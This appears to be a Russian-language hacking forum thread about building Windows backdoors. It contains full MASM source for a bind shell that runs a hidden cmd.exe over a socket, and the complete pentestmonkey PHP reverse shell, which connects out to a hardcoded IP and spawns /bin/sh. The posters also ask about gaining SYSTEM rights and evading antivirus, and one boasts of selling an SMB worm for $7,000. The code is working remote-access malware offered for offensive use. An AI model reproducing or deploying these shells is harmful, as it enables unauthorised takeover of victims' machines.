Добрый вечер! Давно начал писать на fasm 64 программу, до самого бекконнекта не дошол, то винду переставить то форум закрыт... В общем буду переписывать код вот этой всем известной программы на fasm и хочу добавить плюшки По какому принцапу реализуется соединение с netcat? По порядку функции если можно назовите Код (Text): ShellClient proto :dword Shelld proto :dword SHELL_SERVER struct dwsocket dd ? dwport dd ? bsync db ? SHELL_SERVER ends .code ShellClient proc dwSock:dword local sat:SECURITY_ATTRIBUTES local hiRead:dword local hoRead:dword local hiWrite:dword local hoWrite:dword local startupinfo:STARTUPINFO local processinfo:PROCESS_INFORMATION local exitcode:dword local buffer[1024]:byte local bytes:dword local available:dword local data:dword mov sat.nLength, sizeof SECURITY_ATTRIBUTES mov sat.lpSecurityDescriptor, 0 mov sat.bInheritHandle, TRUE invoke CreatePipe, addr hiRead, addr hiWrite, addr sat, 0 invoke CreatePipe, addr hoRead, addr hoWrite, addr sat, 0 invoke GetStartupInfo, addr startupinfo mov startupinfo.cb, sizeof STARTUPINFO mov eax, hoWrite mov startupinfo.hStdOutput, eax mov startupinfo.hStdError, eax mov eax, hiRead mov startupinfo.hStdInput, eax mov startupinfo.dwFlags, STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES mov startupinfo.wShowWindow, SW_HIDE invoke CreateProcess, 0, addr szCommandLine, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0, 0, addr startupinfo, addr processinfo invoke CloseHandle, hoWrite invoke CloseHandle, hiRead mov bytes, 1 invoke ioctlsocket, dwSock, FIONBIO, addr bytes invoke send, dwSock, addr szBanner, sizeof szBanner, 0 .while TRUE invoke Sleep, 1 invoke GetExitCodeProcess, processinfo.hProcess, addr exitcode .if exitcode != STILL_ACTIVE .break .endif invoke PeekNamedPipe, hoRead, addr buffer, 1024, addr bytes, addr available, 0 .if bytes != 0 .if available > 1024 .while bytes >= 1024 invoke Sleep, 1 invoke ReadFile, hoRead, addr buffer, 1024, addr bytes, 0 .if bytes != 0 invoke send, dwSock, addr buffer, bytes, 0 .endif .endw .else invoke ReadFile, hoRead, addr buffer, 1024, addr bytes, 0 .if bytes != 0 invoke send, dwSock, addr buffer, bytes, 0 .endif .endif .endif @@: invoke recv, dwSock, addr buffer, 1024, 0 .if eax == SOCKET_ERROR || eax == 0 invoke WSAGetLastError .if eax == WSAEWOULDBLOCK .continue .else invoke TerminateProcess, processinfo.hProcess, 0 .break .endif .else mov edx, eax invoke WriteFile, hiWrite, addr buffer, edx, addr bytes, 0 .endif .endw invoke CloseHandle, hiWrite invoke CloseHandle, hoRead invoke closesocket, dwSock ret ShellClient endp Shelld proc lpParam:dword local shelld:SHELL_SERVER local SockAddrIn:sockaddr_in local dwSock:dword local dwMode:dword invoke CopyMemory, addr shelld, lpParam, sizeof shelld invoke socket, PF_INET, SOCK_STREAM, 0 mov dwSock, eax mov eax, lpParam assume eax:ptr HTTP_SERVER mov ecx, dwSock mov [eax].dwsocket, ecx mov [eax].bsync, 1 assume eax:nothing mov SockAddrIn.sin_family, AF_INET invoke htons, shelld.dwport mov SockAddrIn.sin_port, ax mov SockAddrIn.sin_addr, INADDR_ANY invoke bind, dwSock, addr SockAddrIn, sizeof SockAddrIn mov dwMode, 1 invoke ioctlsocket, dwSock, FIONBIO, addr dwMode invoke listen, dwSock, SOMAXCONN @@: invoke accept, dwSock, addr SockAddrIn, 0 .if eax != INVALID_SOCKET mov edx, eax invoke CreateThread, 0, 0, addr ShellClient, edx, 0, 0 invoke CloseHandle, eax .endif invoke Sleep, 1000 jmp @B ret Shelld endp
И еще такой вопросик. Может не совсем по теме, как получить права SYSTEM в Windows 10 И стоит ли вообще делать бекконект или сделать обычный бинд, как к этому будут относится Windows Server и\или авири
Код (C): <?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. The author accepts no liability // for damage caused by this tool. If these terms are not acceptable to you, then // do not use this tool. // // In all other respects the GPL version 2 applies: // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License version 2 as // published by the Free Software Foundation. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License along // with this program; if not, write to the Free Software Foundation, Inc., // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. If these terms are not acceptable to // you, then do not use this tool. // // You are encouraged to send comments, improvements or suggestions to // me at pentestmonkey@pentestmonkey.net // // Description // ----------- // This script will make an outbound TCP connection to a hardcoded IP and port. // The recipient will be given a shell running as the current user (apache normally). // // Limitations // ----------- // proc_open and stream_set_blocking require PHP version 4.3+, or 5+ // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows. // Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available. // // Usage // ----- // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); $VERSION = "1.0"; $ip = '127.0.0.1'; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } // Change to a safe directory chdir("/"); // Remove any umask we inherited umask(0); // // Do the reverse shell... // // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } // Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>
Да я товарищь sl0n, могу червя выложить через пайпы и SMB, да толку? Мне ребята 7к $ за него закинули и пропали а потом за фигнюшки деанонят/обвиняют
